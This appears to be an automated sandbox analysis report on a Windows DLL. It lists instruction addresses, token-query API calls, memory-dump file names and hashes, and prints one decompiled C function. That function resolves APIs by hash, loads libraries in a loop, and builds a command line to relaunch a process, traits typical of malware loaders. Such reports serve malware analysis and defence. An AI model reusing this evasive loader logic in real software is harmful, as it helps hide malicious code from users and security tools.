0x6e7947c9
0x6e7950e3
0x00000000
0x6e7947cf
0x6e7947d1
0x6e7947fe
0x6e794803
0x6e794809
0x6e79480d
0x6e7950ba
0x6e7950c5
0x6e7950cb
0x6e7950cb
0x6e7950ba
0x6e794815
0x00000000
0x6e79481b
0x6e794822
0x6e79482a
0x00000000
0x6e79482a
0x6e7947d3
0x6e7947d3
0x6e7947d3
0x6e7947d5
0x6e7947d7
0x6e7947e5
0x6e7947e6
0x6e7947ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7947ec
0x6e7950d2
0x6e7950d8
0x6e79482c
0x6e79482e
0x6e7948fc
0x6e794903
0x6e794834
0x6e794838
0x6e794839
0x6e79483b
0x6e794841
0x6e79504d
0x6e795054
0x6e79507a
0x6e79507c
0x00000000
0x6e79507e
0x6e79507e
0x6e79507f
0x6e79507f
0x6e795056
0x6e79505b
0x6e795061
0x6e795065
0x6e79509d
0x6e7950a4
0x6e7950aa
0x6e7950aa
0x6e79509d
0x6e795069
0x6e79508d
0x6e795082
0x00000000
0x6e795088
0x00000000
0x6e795088
0x6e79506b
0x6e795072
0x6e795075
0x00000000
0x6e795075
0x6e795069
0x6e794847
0x6e794847
0x6e79484b
0x6e794851
0x6e794855
0x6e79485a
0x6e794868
0x6e795038
0x00000000
0x6e79486e
0x6e794870
0x6e79489d
0x6e7948a2
0x6e7948a8
0x6e7948ac
0x6e79500f
0x6e79501a
0x6e795020
0x6e795020
0x6e79500f
0x6e7948b4
0x00000000
0x6e7948b6
0x6e7948bd
0x6e7948c5
0x00000000
0x6e7948c5
0x6e794872
0x6e794872
0x6e794872
0x6e794874
0x6e794876
0x6e794884
0x6e794885
0x6e79488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79488b
0x6e795027
0x6e79502d
0x6e7948c7
0x6e7948c9
0x6e7948e4
0x6e7948e4
0x6e7948ea
0x6e794904
0x6e794909
0x6e79490e
0x6e79491a
0x6e794f51
0x00000000
0x6e794920
0x6e794922
0x6e79494f
0x6e794954
0x6e79495a
0x6e79495e
0x6e794f28
0x6e794f33
0x6e794f39
0x6e794f39
0x6e794f28
0x6e794966
0x00000000
0x6e794968
0x6e79496f
0x6e794977
0x00000000
0x6e794977
0x6e794924
0x6e794924
0x6e794924
0x6e794926
0x6e794928
0x6e794936
0x6e794937
0x6e79493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79493d
0x6e794f40
0x6e794f46
0x6e794979
0x6e79497b
0x6e7949a3
0x6e7949c1
0x6e7949c5
0x6e794e71
0x6e794e7d
0x6e794f10
0x00000000
0x6e794e83
0x6e794e85
0x6e794eae
0x6e794eb3
0x6e794eb9
0x6e794ebd
0x6e794ef5
0x6e794efc
0x6e794f02
0x6e794f02
0x6e794ef5
0x6e794ec1
0x00000000
0x6e794ec3
0x6e794eca
0x6e794ecd
0x00000000
0x6e794ecd
0x6e794e87
0x6e794e87
0x6e794e87
0x6e794e89
0x6e794e8b
0x6e794e95
0x6e794e96
0x6e794e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794e9c
0x6e794f06
0x6e794f0c
0x6e794ed2
0x6e794ed4
0x6e794ee5
0x6e794eda
0x00000000
0x6e794ee0
0x00000000
0x6e794ee0
0x6e794ed6
0x6e794ed6
0x6e794ed7
0x6e794ed7
0x6e794f0e
0x00000000
0x6e794f0e
0x00000000
0x6e794e9e
0x6e794e9e
0x6e794ea4
0x6e794ea4
0x6e794eaa
0x00000000
0x6e794e87
0x6e794e85
0x6e7949cb
0x6e7949cb
0x6e7949d6
0x6e7949df
0x6e7949e4
0x6e7949e9
0x6e7949ef
0x6e7949f7
0x6e794a01
0x6e794e62
0x00000000
0x6e794a07
0x6e794a09
0x6e794a36
0x6e794a3b
0x6e794a41
0x6e794a45
0x6e794e39
0x6e794e44
0x6e794e4a
0x6e794e4a
0x6e794e39
0x6e794a4d
0x00000000
0x6e794a53
0x6e794a5a
0x6e794a62
0x00000000
0x6e794a62
0x6e794a0b
0x6e794a0b
0x6e794a0b
0x6e794a0d
0x6e794a0f
0x6e794a1d
0x6e794a1e
0x6e794a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794a24
0x6e794e51
0x6e794e57
0x6e794a64
0x6e794a66
0x6e794bef
0x6e794bf2
0x6e794bfc
0x6e794c02
0x6e794c02
0x6e794c0e
0x6e794a6c
0x6e794a76
0x6e794a77
0x6e794a78
0x6e794a79
0x6e794a7a
0x6e794a7b
0x6e794a7c
0x6e794a7d
0x6e794a82
0x6e794a84
0x6e794a86
0x6e794a8b
0x6e794d80
0x6e794d8c
0x6e794e21
0x00000000
0x6e794d92
0x6e794d94
0x6e794dbf
0x6e794dc4
0x6e794dca
0x6e794dce
0x6e794e06
0x6e794e0d
0x6e794e13
0x6e794e13
0x6e794e06
0x6e794dd2
0x00000000
0x6e794dd4
0x6e794ddb
0x6e794dde
0x00000000
0x6e794dde
0x6e794d96
0x6e794d98
0x6e794d98
0x6e794d9a
0x6e794d9c
0x6e794da6
0x6e794da7
0x6e794dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794dad
0x6e794e17
0x6e794e1d
0x6e794de3
0x6e794de5
0x6e794df6
0x6e794deb
0x00000000
0x6e794df1
0x00000000
0x6e794df1
0x6e794de7
0x6e794de7
0x6e794de8
0x6e794de8
0x6e794e1f
0x00000000
0x6e794e1f
0x00000000
0x6e794daf
0x6e794daf
0x6e794db5
0x6e794db5
0x6e794dbb
0x00000000
0x6e794d98
0x6e794d94
0x6e794a91
0x6e794a91
0x6e794a91
0x6e794a99
0x6e794b47
0x6e794b49
0x6e794b54
0x6e794b50
0x6e794b50
0x6e794b50
0x6e794b5b
0x6e794bcf
0x6e794bd2
0x6e794bdc
0x6e794be2
0x6e794be2
0x6e794bee
0x6e794b5d
0x6e794b5d
0x6e794b69
0x6e794d2d
0x00000000
0x6e794b6f
0x6e794b71
0x6e794ba0
0x6e794ba5
0x6e794bab
0x6e794baf
0x6e794d04
0x6e794d0f
0x6e794d15
0x6e794d15
0x6e794d04
0x6e794bb7
0x00000000
0x6e794bb9
0x6e794bc0
0x6e794bc3
0x00000000
0x6e794bc3
0x6e794b73
0x6e794b75
0x6e794b75
0x6e794b77
0x6e794b79
0x6e794b87
0x6e794b88
0x6e794b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794b8e
0x6e794d1c
0x6e794d22
0x6e794bc8
0x6e794bca
0x00000000
0x6e794bcc
0x6e794bcc
0x6e794bcd
0x6e794bce
0x6e794bce
0x6e794d28
0x00000000
0x6e794d28
0x00000000
0x6e794b90
0x6e794b90
0x6e794b96
0x6e794b96
0x6e794b9c
0x00000000
0x6e794b75
0x6e794b71
0x6e794b69
0x6e794a9f
0x6e794aa1
0x6e794aa5
0x6e794aa9
0x6e794aab
0x6e794aaf
0x6e794ab1
0x6e794ab1
0x6e794abd
0x6e794d71
0x00000000
0x6e794ac3
0x6e794ac5
0x6e794af4
0x6e794af9
0x6e794aff
0x6e794b03
0x6e794d48
0x6e794d53
0x6e794d59
0x6e794d59
0x6e794d48
0x6e794b0b
0x00000000
0x6e794b0d
0x6e794b14
0x6e794b17
0x00000000
0x6e794b17
0x6e794ac7
0x6e794ac9
0x6e794ac9
0x6e794acb
0x6e794acd
0x6e794adb
0x6e794adc
0x6e794ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794ae2
0x6e794d60
0x6e794d66
0x6e794b1c
0x6e794b1e
0x00000000
0x6e794b20
0x6e794b20
0x6e794b24
0x6e794b28
0x6e794b29
0x6e794b29
0x6e794d6c
0x00000000
0x6e794d6c
0x00000000
0x6e794ae4
0x6e794ae4
0x6e794aea
0x6e794aea
0x6e794af0
0x00000000
0x6e794ac9
0x6e794ac5
0x00000000
0x6e794b32
0x6e794b32
0x6e794b33
0x6e794b3b
0x6e794b3f
0x00000000
0x6e794b43
0x6e794a99
0x6e794a8b
0x6e794e5d
0x00000000
0x6e794e5d
0x00000000
0x6e794a26
0x6e794a26
0x6e794a2c
0x6e794a2c
0x6e794a32
0x00000000
0x6e794a0b
0x6e794a09
0x6e794a01
0x6e79497d
0x6e79497d
0x6e794980
0x6e79498a
0x6e794990
0x6e794990
0x6e79499c
0x6e79499c
0x6e794f4c
0x00000000
0x6e794f4c
0x00000000
0x6e79493f
0x6e79493f
0x6e794945
0x6e794945
0x6e79494b
0x00000000
0x6e794924
0x6e794922
0x6e7948ec
0x6e7948f1
0x6e7948f7
0x6e7948f7
0x00000000
0x6e7948f1
0x6e7948cb
0x6e7948da
0x6e7948de
0x6e794f60
0x6e794f6c
0x6e794fda
0x00000000
0x6e794f6e
0x6e794f70
0x6e794f99
0x6e794f9e
0x6e794fa4
0x6e794fa8
0x6e794ff2
0x6e794ff9
0x6e794fff
0x6e794fff
0x6e794ff2
0x6e794fac
0x00000000
0x6e794fb2
0x6e794fb9
0x6e794fbc
0x00000000
0x6e794fbc
0x6e794f72
0x6e794f72
0x6e794f72
0x6e794f74
0x6e794f76
0x6e794f80
0x6e794f81
0x6e794f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794f87
0x6e794fd0
0x6e794fd6
0x6e794fc1
0x6e794fc3
0x00000000
0x6e794fc9
0x6e794fc9
0x6e794fca
0x6e794fca
0x6e794fd8
0x00000000
0x6e794fd8
0x00000000
0x6e794f89
0x6e794f89
0x6e794f8f
0x6e794f8f
0x6e794f95
0x00000000
0x6e794f72
0x6e794f70
0x00000000
0x00000000
0x00000000
0x6e7948de
0x6e795033
0x00000000
0x6e795033
0x00000000
0x6e79488d
0x6e79488d
0x6e794893
0x6e794893
0x6e794899
0x00000000
0x6e794872
0x6e794870
0x6e794868
0x6e794841
0x6e7950de
0x00000000
0x6e7950de
0x00000000
0x6e7947ee
0x6e7947ee
0x6e7947f4
0x6e7947f4
0x6e7947fa
0x00000000
0x6e7947d3
0x6e7947d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 6E7948DA
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?,00000000), ref: 6E7949C1

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: a04bbd41c439bcac1e57484631a82113afe6f755d790bdb8a7c79c45df07bbae
Instruction ID: c8c929f72bc58442f1946d73ba2915ad988d38031f5a41c25e1d7a9a6a6697c0
Opcode Fuzzy Hash: a04bbd41c439bcac1e57484631a82113afe6f755d790bdb8a7c79c45df07bbae
Instruction Fuzzy Hash: CE1207307043038BDB54CEE9ABD4B6A32D9AF41208F148A7DD975CB2B5FB24D806BA51

Uniqueness

Uniqueness Score: -1.00%

Function 6E78543B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E78543B() {
				signed int _t131;
				void* _t134;
				signed int _t142;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t170;
				intOrPtr _t171;
				intOrPtr* _t175;
				void* _t190;
				void* _t200;
				intOrPtr _t203;
				signed int _t213;
				signed int _t217;
				void* _t232;
				intOrPtr* _t233;
				signed int _t236;
				unsigned int _t240;
				intOrPtr _t243;
				signed short* _t244;
				signed int _t247;
				void* _t265;
				void* _t273;
				signed int _t276;
				signed int _t277;
				signed int _t280;
				signed int _t281;
				intOrPtr* _t325;
				intOrPtr* _t333;
				signed int _t348;
				signed int _t350;
				signed int _t353;
				intOrPtr* _t385;
				void* _t400;
				signed int _t401;
				void* _t406;
				signed int _t407;
				intOrPtr* _t410;
				void* _t413;
				intOrPtr* _t416;

				asm("outsb");
				_t410 = E6E793930(_t273, 0, _t400, _t404);
				if( *_t410 < 0x10) {
					L6E785150();
				}
				E6E786020(_t273);
				E6E798810(_t416 + 0x114, 0x200);
				_t385 = E6E7915C0(0xa1310f65, 0xc4d11e8a);
				if(_t385 != 0) {
					 *_t385(0,  *(_t416 + 0x114),  *(_t416 + 0x114) >> 1);
				}
				E6E792580(_t416 + 0x118, _t400, _t404);
				if(E6E799C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0x118))) == 0) {
					E6E792780(_t416 + 0xe4, _t400, _t404);
					_t131 = E6E799C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0xe4)));
					__eflags = _t131;
					if(_t131 == 0) {
						E6E792580(_t416 + 0xb4, _t400, _t404);
						_t404 = _t416 + 0x98;
						E6E79D980(_t416 + 0xbc, _t416 + 0x98, 0x5c);
						_t134 = E6E7A7600(_t416 + 0x98, 2);
						E6E78AC00(_t416 + 0xbc, 6);
						E6E798CC0(_t134,  *((intOrPtr*)(_t416 + 0xbc)));
						E6E798CA0(_t416 + 0xbc);
						E6E7A89F0(_t404, _t416 + 0x124, 0x5c);
						E6E7A8910(_t404, _t400, _t404);
						E6E798CA0(_t416 + 0xb4);
						_t142 = E6E799C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0x120)));
						__eflags = _t142;
						_t23 = _t142 > 0;
						__eflags = _t23;
						_t276 = 0 | _t23;
						E6E798CA0(_t416 + 0x120);
					} else {
						_t276 = 1;
					}
					E6E798CA0(_t416 + 0xe4);
					E6E798CA0(_t416 + 0x118);
					__eflags = _t276;
					if(_t276 == 0) {
						_t277 = 0;
						__eflags = 0;
					} else {
						goto L11;
					}
				} else {
					E6E798CA0(_t416 + 0x118);
					L11:
					_t277 = 1;
				}
				E6E78AC00(_t416 + 0x120, 2);
				E6E79D980(_t416 + 0x128, _t416 + 0x130, 0x7e);
				E6E798CA0(_t416 + 0x120);
				if( *(_t416 + 0x130) > 0) {
					 *_t416 = _t410;
					_t401 = _t416 + 0x130;
					L15:
					while(1) {
						L15:
						while(1) {
							L15:
							if(E6E7915C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E6E7A7600(_t401, _t404))); // executed
							}
							_t265 =  *(_t416 + 0x130);
							while(1) {
								_t404 = 1;
								if(1 >= _t265) {
									break;
								}
								if(1 != 4) {
									goto L15;
								} else {
									_t388 =  *0x6e7bb02a & 0x000000ff;
									if(( *0x6e7bb02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L23;
							}
							_t410 =  *_t416;
							goto L23;
						}
					}
				}
				L23:
				__eflags =  *((intOrPtr*)(_t410 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t410 + 0x2c)) != 2) {
					__eflags =  *0x6e7bb028 & 0x000000ff;
					if(( *0x6e7bb028 & 0x000000ff) == 0) {
						__eflags =  *0x6e7bb265 & 0x000000ff;
						if(( *0x6e7bb265 & 0x000000ff) == 0) {
							__eflags =  *0x6e7bb1cc - 1;
							if( *0x6e7bb1cc != 1) {
								_t243 =  *0x6e7bb1d0; // 0xee2630
								_t38 = _t243 + 4; // 0xee2658
								_t244 =  *_t38;
								_t388 =  *_t244 & 0x0000ffff;
								__eflags = ( *_t244 & 0x0000ffff) - 0x2d;
								if(( *_t244 & 0x0000ffff) != 0x2d) {
									E6E798AB0(_t416 + 0xcc, _t244, 0);
									_push(0x80);
									_push(0);
									E6E7AA4E0(_t416 + 0x68, __eflags,  *((intOrPtr*)(_t416 + 0xd0)), 1);
									_t247 = E6E7ABEA0(_t416 + 0x64, _t388, _t404);
									__eflags = _t247;
									if(_t247 == 0) {
										__eflags =  *((char*)(_t416 + 0x68));
										if( *((char*)(_t416 + 0x68)) != 0) {
											E6E7ABE30(_t416 + 0x64, _t404);
										}
										E6E798CA0(_t416 + 0x58);
										_t407 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E6E7AA730(_t416 + 0xc4, _t388);
											if(__eflags == 0) {
												break;
											}
											E6E7922A0(0x64, _t388);
											_t407 = _t407 + 1;
											__eflags = _t407 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t404 = _t416 + 0xcc;
										do {
											E6E79AE80(_t416 + 0xcc, __eflags, _t404, 0x5c);
											E6E798CC0(_t416 + 0xc8,  *(_t416 + 0xcc));
											E6E798CA0(_t404);
											__eflags = E6E7AA730(_t416 + 0xc4, _t388);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t416 + 0x68));
										if( *((char*)(_t416 + 0x68)) != 0) {
											E6E7ABE30(_t416 + 0x64, _t404);
										}
										E6E798CA0(_t416 + 0x58);
									}
									E6E798CA0(_t416 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x6e7bb02a & 0x000000ff) - 2;
					if(( *0x6e7bb02a & 0x000000ff) == 2) {
						L52:
						_t152 =  *0x6e7bb1ad; // 0xeba350
						__eflags = _t152;
						if(_t152 == 0) {
							L54:
							_t153 =  *0x6e7bb1ad; // 0xeba350
							__eflags = _t153;
							if(_t153 == 0) {
								_push(0x10);
								_t154 = E6E791030();
								_t416 = _t416 + 4;
								__eflags = _t154;
								if(_t154 != 0) {
									_push(0);
									_t155 = E6E7A9350(_t154);
								} else {
									_t155 = 0;
								}
								 *0x6e7bb1ad = _t155;
							}
							_t404 =  *0x6e7bb1ad; // 0xeba350
							__eflags = ( *0x6e7bb02a & 0x000000ff) - 1;
							if(( *0x6e7bb02a & 0x000000ff) == 1) {
								_t388 = 0x18f8c844;
								_t401 = _t416 + 0x28;
								E6E786AD0(_t277, _t401, 0x18f8c844, _t401, _t404, 1, 0);
								_push(_t401);
								E6E7A9520(_t404);
								E6E7A9510(_t401);
							} else {
								E6E7A9710(_t404, 0x6e7bb02d,  *0x6e7bb02b & 0x0000ffff);
							}
						} else {
							_t350 =  *0x6e7bb1ad; // 0xeba350
							_t217 = E6E7A9660(_t350);
							__eflags = _t217;
							if(_t217 != 0) {
								goto L54;
							}
						}
						_t160 =  *0x6e7bb1b1; // 0x0
						__eflags = _t160;
						if(_t160 == 0) {
							L60:
							_t161 =  *0x6e7bb1b1; // 0x0
							__eflags = _t161;
							if(_t161 == 0) {
								_push(0x10);
								_t162 = E6E791030();
								_t416 = _t416 + 4;
								__eflags = _t162;
								if(_t162 != 0) {
									_push(0);
									_t163 = E6E7A9350(_t162);
								} else {
									_t163 = 0;
								}
								 *0x6e7bb1b1 = _t163;
							}
							_t401 =  *0x6e7bb1b1; // 0x0
							__eflags = ( *0x6e7bb02a & 0x000000ff) - 1;
							if(( *0x6e7bb02a & 0x000000ff) == 1) {
								_t388 = 0x11041f01;
								E6E786AD0(_t277, _t416 + 0x38, 0x11041f01, _t401, _t404, 1, 1);
								_push(_t416 + 0x38);
								E6E7A9520(_t401);
								E6E7A9510(_t416 + 0x38);
								_t170 = E6E7A9650(_t401);
								__eflags = _t170;
								if(_t170 != 0) {
									_t388 = 0xd3ef7577;
									E6E786AD0(_t277, _t416 + 8, 0xd3ef7577, _t401, _t404, 0, 0);
									E6E7A9510(_t416);
								}
							} else {
								_t404 =  *0x6e7bb1c4; // 0x6e780000
								__eflags =  *((char*)(E6E793930(_t277, 0, _t401, _t404) + 0xb)) - 0x20;
								_t397 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t388 = _t404;
								E6E789090(_t416 + 0x88, _t404,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t416 + 0x88);
								E6E7A9520(_t401);
								E6E7A9510(_t416 + 0x88);
							}
						} else {
							_t348 =  *0x6e7bb1b1; // 0x0
							_t213 = E6E7A9660(_t348);
							__eflags = _t213;
							if(_t213 != 0) {
								goto L60;
							}
						}
						_t171 =  *((intOrPtr*)(_t410 + 0x2c));
						__eflags = _t171 - 3;
						if(_t171 == 3) {
							__eflags =  *0x6e7bb1cc - 3;
							if( *0x6e7bb1cc == 3) {
								E6E798CC0(_t416 + 0x10c,  *((intOrPtr*)( *0x6e7bb1d0 + 8)));
							}
							_t278 = _t416 + 0x48;
							E6E798810(_t416 + 0x48, 0);
							_t175 = E6E799890(_t278, _t416 + 0x48, _t388, _t401, _t404, _t278, 0x6e7b9428,  *((intOrPtr*)(_t410 + 0x2c)));
							E6E7A0220(_t416 + 0x110,  *_t175, 0);
							E6E798CA0(_t278);
							L6E788180(_t404);
						} else {
							__eflags = _t171 - 5;
							if(_t171 != 5) {
								__eflags = _t171 - 6;
								if(__eflags == 0) {
									_t325 = _t416 + 0xa4;
									 *_t325 = 0;
									 *((intOrPtr*)(_t325 + 4)) = 0;
									 *((intOrPtr*)(_t325 + 8)) = 0;
									 *((intOrPtr*)(_t325 + 0xc)) = 0;
									E6E795B60(_t277, _t325, _t401, _t404, __eflags);
									E6E786740(_t416 + 0xa4);
									E6E791350(0x12);
									__eflags =  *(_t416 + 0xa8);
									if( *(_t416 + 0xa8) > 0) {
										_t280 = 0;
										__eflags = 0;
										do {
											_t190 = E6E7B2B00(_t416 + 0xa8, _t280);
											__eflags =  *((char*)(_t190 + 0x3c));
											if( *((char*)(_t190 + 0x3c)) == 0) {
												L6E782A40(_t416 + 0x50, _t190);
												E6E798CA0(_t416 + 0x50);
											}
											_t280 = _t280 + 1;
											__eflags = _t280 -  *(_t416 + 0xa8);
										} while (_t280 <  *(_t416 + 0xa8));
									}
									E6E7B2970(_t277, _t416 + 0xa4, _t401);
									_t329 =  *(_t416 + 0xb0);
									__eflags =  *(_t416 + 0xb0);
									if( *(_t416 + 0xb0) != 0) {
										E6E782A20(_t329, 1);
									}
								}
							} else {
								__eflags = _t277;
								if(_t277 == 0) {
									__eflags =  *0x6e7bb1cc - 1;
									if(__eflags <= 0) {
										L69:
										_t333 = _t416 + 0x18;
										 *_t333 = 0;
										 *((intOrPtr*)(_t333 + 4)) = 0;
										 *((intOrPtr*)(_t333 + 8)) = 0;
										 *((intOrPtr*)(_t333 + 0xc)) = 0;
										E6E795B60(_t277, _t333, _t401, _t404, __eflags);
										__eflags = ( *0x6e7bb029 & 0x000000ff) - 1;
										E6E787DB0(_t416 + 0x18, 0 | ( *0x6e7bb029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x6e7bb029 & 0x000000ff;
										if(( *0x6e7bb029 & 0x000000ff) != 0) {
											E6E791350(0x12);
											__eflags =  *(_t416 + 0x1c);
											if( *(_t416 + 0x1c) > 0) {
												_t281 = 0;
												__eflags = 0;
												do {
													_t200 = E6E7B2B00(_t416 + 0x1c, _t281);
													__eflags =  *((char*)(_t200 + 0x3c));
													if( *((char*)(_t200 + 0x3c)) == 0) {
														L6E782A40(_t416 + 0x10, _t200);
														E6E798CA0(_t416 + 0x10);
													}
													_t281 = _t281 + 1;
													__eflags = _t281 -  *(_t416 + 0x1c);
												} while (_t281 <  *(_t416 + 0x1c));
											}
										}
										E6E7B2970(_t277, _t416 + 0x18, _t401);
										_t336 =  *(_t416 + 0x24);
										__eflags =  *(_t416 + 0x24);
										if( *(_t416 + 0x24) != 0) {
											E6E782A20(_t336, 1);
										}
									} else {
										_t203 =  *0x6e7bb1d0; // 0xee2630
										_t81 = _t203 + 4; // 0xee2658
										__eflags = ( *( *_t81) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L69;
										}
									}
								}
							}
						}
						E6E7A8910(_t416 + 0x130, _t401, _t404);
						E6E798CA0(_t416 + 0x110);
						E6E798CA0(_t416 + 0x108);
						E6E797A70(_t416 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x6e7bb027 & 0x000000ff;
						if(( *0x6e7bb027 & 0x000000ff) == 0) {
							goto L52;
						} else {
							__eflags = _t277;
							if(_t277 != 0) {
								goto L52;
							} else {
								__eflags =  *((char*)(_t410 + 0xb)) - 0x20;
								_t399 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								L6E7861B0(_t277, _t416 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916, _t400, _t404, _t410);
								E6E798810(_t416 + 0x18, 0x200);
								_t353 = E6E7915C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t353;
								if(__eflags != 0) {
									_t240 =  *(_t416 + 0x18) >> 1;
									__eflags = _t240;
									_t399 =  *0x6e7bb1c4; // 0x6e780000
									 *_t353(_t399,  *(_t416 + 0x18), _t240);
								}
								_push(0x80);
								_push(0);
								E6E7AA4E0(_t416 + 0x10, __eflags,  *((intOrPtr*)(_t416 + 0x20)), 1);
								E6E7AA520(_t416 + 8, _t399, _t416 + 0x1c, 0);
								__eflags =  *((char*)(_t416 + 0x10));
								if( *((char*)(_t416 + 0x10)) != 0) {
									E6E7ABE30(_t416 + 0xc, _t404);
								}
								__eflags = 0;
								E6E798CA0(_t416);
								_t406 = _t416 + 0x1a0;
								_t413 = _t416 + 0x2c;
								while(1) {
									E6E790B70(_t406, 0, 0x44);
									 *((intOrPtr*)(_t416 + 0x1ac)) = 0x44;
									E6E790B70(_t413, 0, 0x10);
									_t416 = _t416 + 0x18;
									E6E798810(_t416 + 0x4c, 0);
									_t232 = E6E7996D0(E6E7996D0(E6E7A0220(_t416 + 0x50,  *((intOrPtr*)(_t416 + 0x40)), 0), 0x20), 0x22);
									_t233 =  *0x6e7bb1d0; // 0xee2630
									E6E7996D0(E6E7A0220(_t232,  *_t233, 0), 0x22);
									_t236 = E6E7915C0(0xa1310f65, 0x643f303c);
									__eflags = _t236;
									if(_t236 != 0) {
										break;
									}
									E6E798CA0(_t416 + 0x48);
								}
								_push(_t413);
								_push(_t406);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t416 + 0x68)));
								_push( *((intOrPtr*)(_t416 + 0x60)));
								asm("int3");
								return _t236;
							}
						}
					}
				} else {
					E6E7A8910(_t416 + 0x130, _t400, _t404);
					E6E798CA0(_t416 + 0x110);
					E6E798CA0(_t416 + 0x108);
					E6E797A70(_t416 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x6e78543d
0x6e785451
0x6e785457
0x6e785459
0x6e785459
0x6e78545e
0x6e78546f
0x6e785483
0x6e785487
0x6e78549c
0x6e78549c
0x6e7854a5
0x6e7854bf
0x6e7854d9
0x6e7854ec
0x6e7854f1
0x6e7854f3
0x6e785506
0x6e78550b
0x6e78551c
0x6e785525
0x6e785538
0x6e785546
0x6e785552
0x6e785563
0x6e78556a
0x6e785576
0x6e785589
0x6e785590
0x6e785599
0x6e785599
0x6e785599
0x6e78559c
0x6e7854f5
0x6e7854f5
0x6e7854f5
0x6e7855a8
0x6e7855b4
0x6e7855b9
0x6e7855bb
0x6e7855c4
0x6e7855c4
0x00000000
0x00000000
0x00000000
0x6e7854c1
0x6e7854c8
0x6e7855bd
0x6e7855bd
0x6e7855bd
0x6e7855d2
0x6e7855e8
0x6e7855f4
0x6e785601
0x6e785603
0x6e785608
0x00000000
0x6e78560f
0x00000000
0x6e78560f
0x6e78560f
0x6e785622
0x6e78562e
0x6e78562e
0x6e785630
0x6e785637
0x6e785637
0x6e78563a
0x00000000
0x00000000
0x6e78563f
0x00000000
0x6e785641
0x6e785641
0x6e78564b
0x00000000
0x6e78564d
0x00000000
0x6e78564d
0x6e78564b
0x00000000
0x6e78563f
0x6e78564f
0x00000000
0x6e78564f
0x6e78560f
0x6e78560f
0x6e785652
0x6e785652
0x6e785656
0x6e78569c
0x6e78569e
0x6e7856ab
0x6e7856ad
0x6e7856b3
0x6e7856ba
0x6e7856c0
0x6e7856c5
0x6e7856c5
0x6e7856c8
0x6e7856cb
0x6e7856ce
0x6e7856de
0x6e7856e3
0x6e7856e8
0x6e7856f7
0x6e785700
0x6e785705
0x6e785707
0x6e785724
0x6e785729
0x6e78572f
0x6e78572f
0x6e785738
0x6e78573d
0x6e78573d
0x6e78573f
0x6e78574b
0x6e78574d
0x00000000
0x00000000
0x6e785754
0x6e785759
0x6e78575a
0x6e78575d
0x00000000
0x00000000
0x00000000
0x6e78575d
0x6e78575f
0x6e785766
0x6e785770
0x6e785783
0x6e78578a
0x6e78579b
0x6e78579b
0x6e785709
0x6e785709
0x6e78570e
0x6e785714
0x6e785714
0x6e78571d
0x6e78571d
0x6e7857a6
0x6e7857a6
0x6e7856ce
0x6e7856ba
0x6e7856ad
0x6e7857b2
0x6e7857b5
0x6e785b3c
0x6e785b3c
0x6e785b41
0x6e785b43
0x6e785b54
0x6e785b54
0x6e785b59
0x6e785b5b
0x6e785e33
0x6e785e35
0x6e785e3a
0x6e785e3d
0x6e785e3f
0x6e785e47
0x6e785e49
0x6e785e41
0x6e785e41
0x6e785e41
0x6e785e4e
0x6e785e4e
0x6e785b61
0x6e785b6e
0x6e785b71
0x6e785e0b
0x6e785e10
0x6e785e1a
0x6e785e21
0x6e785e22
0x6e785e29
0x6e785b77
0x6e785b86
0x6e785b86
0x6e785b45
0x6e785b45
0x6e785b4b
0x6e785b50
0x6e785b52
0x00000000
0x00000000
0x6e785b52
0x6e785b92
0x6e785b97
0x6e785b99
0x6e785baa
0x6e785baa
0x6e785baf
0x6e785bb1
0x6e785eb0
0x6e785eb2
0x6e785eb7
0x6e785eba
0x6e785ebc
0x6e785ec4
0x6e785ec6
0x6e785ebe
0x6e785ebe
0x6e785ebe
0x6e785ecb
0x6e785ecb
0x6e785bb7
0x6e785bc4
0x6e785bc7
0x6e785e62
0x6e785e68
0x6e785e73
0x6e785e74
0x6e785e7d
0x6e785e84
0x6e785e89
